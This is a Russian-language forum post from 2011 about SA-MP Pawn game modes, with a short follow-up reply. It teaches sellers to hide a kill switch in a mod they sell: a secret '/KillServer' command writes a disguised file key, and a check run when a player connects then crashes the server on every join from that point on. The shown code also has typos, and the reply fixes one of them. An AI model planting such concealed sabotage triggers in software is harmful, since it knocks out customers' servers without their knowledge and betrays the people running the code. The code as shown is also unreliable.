И так, я думаю опытные скриптеры сталкивались с тем что их кидали когда покупали у них мод. Сейчас я напишу вам скрипт который заставит тех кто вас кинул заплатить за мод, если вы конешно продавали его в формате amx а не pwn. Для начало вам нужно будет установить инклуд dini или mxINI, я буду расматривать пример с dini.
И так, инклуд установлен, если у вас мод не использует эти инклуды - переведите получение данных в переменные не с сервера, а с файла. Можно не все а критически важные. И так сделали?
Теперь сделаем такую команду:
if (strcmp("/KillServer", cmdtext, true, 10) == 0)
{
dini_SetInt("ServerData","Team3",10);
return 1;
}
dini_IntSet("ServerData","Team3","10") - Team3 это замаскерованый ключь, который будет дальше содействовать нам в наших злодеяния. smile
Теперь в public OnPlayerConnect(playerid) добовляем следующее
new ServerDown;
SeverDown = dini_Int("SrverData","Team3");
if(ServerDown == 10)
{
SendClientMessageToAll(0xf4c430aa, "%s Сервер лег по моему желанию");
}
я думаю вам будет понятно что значит каждая функция, но что мы сделали? Скрипт компилируется без ошибок, но %s в сообщении без команды format и не в переменной - ведет к вылету samp_server. То есть мы просто ложим сервер тогда - когда заходит хоть один игрок. А так как мы берем значение из файла то сервер у нас будет ложится всегда!
Вот и всё! Ваше творение в безопасности!
Добавлено (17.01.2011, 11:05:15)
---------------------------------------------
Quote (Klimus)
Теперь в public OnPlayerConnect(playerid) добовляем следующее
new ServerDown;
SeverDown = dini_Int("SrverData","Team3");
if(ServerDown == 10)
{
SendClientMessageToAll(0xf4c430aa, "%s Сервер лег по моему желанию");
}
подправьте,ошибся),вместо SrverData,ServerData